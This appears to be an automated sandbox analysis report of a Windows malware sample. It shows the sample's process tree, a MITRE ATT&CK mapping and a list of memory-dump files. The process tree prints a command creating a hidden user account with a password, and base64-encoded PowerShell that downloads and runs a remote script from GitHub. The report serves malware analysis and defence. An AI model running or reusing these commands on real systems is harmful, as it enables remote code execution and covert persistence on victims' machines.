- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 3AZsh4iD
  2⤵
  PID:3188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 3AZsh4iD
    3⤵
    PID:3096

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2740
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:1556

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3188
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  PID:4088

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3576
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:2264

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/784-209-0x00000299751D6000-0x00000299751D8000-memory.dmp

Filesize
8KB

Download
memory/784-213-0x00000299751D8000-0x00000299751DA000-memory.dmp

Filesize
8KB

Download
memory/784-212-0x00000299751D3000-0x00000299751D5000-memory.dmp

Filesize
8KB

Download
memory/784-211-0x00000299751D0000-0x00000299751D2000-memory.dmp

Filesize
8KB

Download
memory/1808-193-0x000002AD30A60000-0x000002AD30A62000-memory.dmp

Filesize
8KB

Download
memory/1808-204-0x000002AD30A68000-0x000002AD30A6A000-memory.dmp

Filesize
8KB

Download
memory/1808-202-0x000002AD30A66000-0x000002AD30A68000-memory.dmp

Filesize
8KB

Download
memory/1808-194-0x000002AD30A63000-0x000002AD30A65000-memory.dmp

Filesize
8KB

Download
memory/2264-248-0x000001D5AFEB6000-0x000001D5AFEB8000-memory.dmp

Filesize
8KB

Download
memory/2264-247-0x000001D5AFEB3000-0x000001D5AFEB5000-memory.dmp

Filesize
8KB

Download
memory/2264-249-0x000001D5AFEB8000-0x000001D5AFEB9000-memory.dmp

Filesize
4KB

Download
memory/2264-246-0x000001D5AFEB0000-0x000001D5AFEB2000-memory.dmp

Filesize
8KB

Download
memory/3416-206-0x000001DAA3703000-0x000001DAA3705000-memory.dmp

Filesize
8KB

Download
memory/3416-205-0x000001DAA3700000-0x000001DAA3702000-memory.dmp

Filesize
8KB

Download
memory/3416-208-0x000001DAA3706000-0x000001DAA3708000-memory.dmp

Filesize
8KB

Download
memory/3416-210-0x000001DAA3708000-0x000001DAA370A000-memory.dmp

Filesize
8KB

Download
memory/3516-136-0x000001DA79BC0000-0x000001DA79BC2000-memory.dmp

Filesize
8KB

Download
memory/3516-141-0x000001DA79BC8000-0x000001DA79BCA000-memory.dmp

Filesize
8KB

Download
memory/3516-139-0x000001DA79BC6000-0x000001DA79BC7000-memory.dmp

Filesize
4KB

Download
memory/3516-138-0x000001DA79BC5000-0x000001DA79BC6000-memory.dmp

Filesize
4KB

Download
memory/3516-135-0x0000000000400000-0x0000000000A57000-memory.dmp

Filesize
6.3MB

Download
memory/3516-137-0x000001DA79BC3000-0x000001DA79BC5000-memory.dmp

Filesize
8KB

Download
memory/3516-123-0x0000000000400000-0x0000000000A57000-memory.dmp

Filesize
6.3MB

Download
memory/3516-131-0x000001DA7A000000-0x000001DA7A421000-memory.dmp

Filesize
4.1MB

Download
memory/3972-122-0x000000001ED60000-0x000000001F369000-memory.dmp

Filesize
6.0MB

Download
memory/3972-114-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/3972-116-0x000000001CB50000-0x000000001D38A000-memory.dmp

Filesize
8.2MB

Download
memory/3972-118-0x000000001DD60000-0x000000001DD61000-memory.dmp

Filesize
4KB

Download
memory/3972-121-0x0000000001AC0000-0x0000000001AC1000-memory.dmp

Filesize
4KB

Download
memory/3972-119-0x000000001DF30000-0x000000001E55B000-memory.dmp

Filesize
6.2MB

Download
memory/3972-117-0x000000001C6A0000-0x000000001C6A2000-memory.dmp

Filesize
8KB

Download
memory/3972-120-0x0000000001AA0000-0x0000000001AB0000-memory.dmp

Filesize
64KB

Download
memory/4016-168-0x00000288B8D66000-0x00000288B8D68000-memory.dmp

Filesize
8KB

Download
memory/4016-156-0x00000288B8D63000-0x00000288B8D65000-memory.dmp

Filesize
8KB

Download
memory/4016-166-0x00000288B8E00000-0x00000288B8E01000-memory.dmp

Filesize
4KB

Download
memory/4016-174-0x00000288D2730000-0x00000288D2731000-memory.dmp

Filesize
4KB

Download
memory/4016-175-0x00000288B8D68000-0x00000288B8D69000-memory.dmp

Filesize
4KB

Download
memory/4016-148-0x00000288B8DA0000-0x00000288B8DA1000-memory.dmp

Filesize
4KB

Download
memory/4016-173-0x00000288D23A0000-0x00000288D23A1000-memory.dmp

Filesize
4KB

Download
memory/4016-155-0x00000288B8D60000-0x00000288B8D62000-memory.dmp

Filesize
8KB

Download
memory/4016-151-0x00000288D1E10000-0x00000288D1E11000-memory.dmp

Filesize
4KB

Download